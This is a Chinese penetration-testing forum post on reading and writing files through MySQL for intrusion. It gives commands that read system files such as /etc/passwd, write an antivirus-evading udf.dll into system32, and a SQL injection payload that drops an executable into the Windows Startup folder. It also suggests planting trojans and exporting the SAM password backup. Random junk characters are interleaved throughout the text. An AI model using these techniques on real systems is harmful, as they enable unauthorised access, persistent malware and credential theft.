找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 mysql下读取文件的几种方式
返回列表 发新帖
查看: 2798|回复: 0
打印 上一主题 下一主题

mysql下读取文件的几种方式

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 1 @; x& ]' B1 H& }; s0 v$ q/ s
思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同 ( K4 x2 e& g( C4 F. B
9 ]) y( V, K$ }
mysql3.x下
# ~; Y; y1 }5 |$ @6 ]$ }8 c  N/ G, V# ]1 t
不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下
; g' }5 f8 h7 o7 B/ A0 _: @; ?& r9 s0 F1 A4 J, z! K/ |' B7 A
mysql>create table a (cmd text);
3 \! Q/ k2 |- u+ E0 \mysql>load data infile 'c:\\boot.ini' into table a; . G1 z* W( L; r. U) d( I& r3 ]
mysql>select * from a; ' u; `& v2 u; M5 H% F

1 R2 R" K3 R% t5 k, `8 Lmysql4.x下
& e. U! E4 z/ `  G. `# S$ y* j/ t
  l( i  r* \7 t2 r" |; ?- |9 x3 X; rmysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下 ' w, F5 _" P9 E- P, Y$ I/ c) O0 S

% \# |$ [$ L9 V5 ?5 y& s! V* e' O& bmysql>create table a (cmd text); # B) L1 `; V, W- s" Z) m
mysql>insert into a (cmd) values (load_file('c:\\boot.ini'));
9 f4 h1 O- m$ r2 rmysql>select * from a; . S4 X* z: x! ~; }0 K0 {) C, e# x/ W
, G! y, V9 r1 N9 ^, o& t
mysql5.x下
3 u! i, @4 v0 ?: i* @8 N* g/ T9 O' m: I. J. F
在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下
- c4 w  X, g4 U+ d* n& z
3 B% f0 y! l# q4 o' Vmysql>system cat /etc/passwd - t' q0 f% G* c& W6 ~4 L
' @7 @% t; y0 Y( D3 @
; ]; |1 D4 f9 t& o+ n
mysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。
! p: ^: g! \$ ~" S7 q/ g9 k6 N5 K6 ^4 E8 V6 V. ^! u1 N

5 Q7 h: O4 e3 t+ m9 C  g例:把免杀过的udf.dll文件插入系统目录 $ {4 f9 p2 H3 N, _4 U0 e
3 }# f, f& b$ e& B
create table a (cmd LONGBLOB); , e. d" M# @1 X4 _/ ~7 Z0 }7 G
insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll')));
, ]# ]$ ?3 f8 ISELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';
& }) s: }5 n# v6 ~( e! a0 _: D" }7 o& n( m7 x7 U9 G5 h: p
其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。
3 y( E6 t6 g- v# Y8 K, S
# C" S9 @; o( d/ h  P- b  A  g8 B3 S
注入中的语法(未测试) 0 @* E, s4 n: O1 [7 |
* j. W) b' i; M& O( ~7 p$ ^

4 K& c' n# r% n% P+ S* x: x# Q6 Jid=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表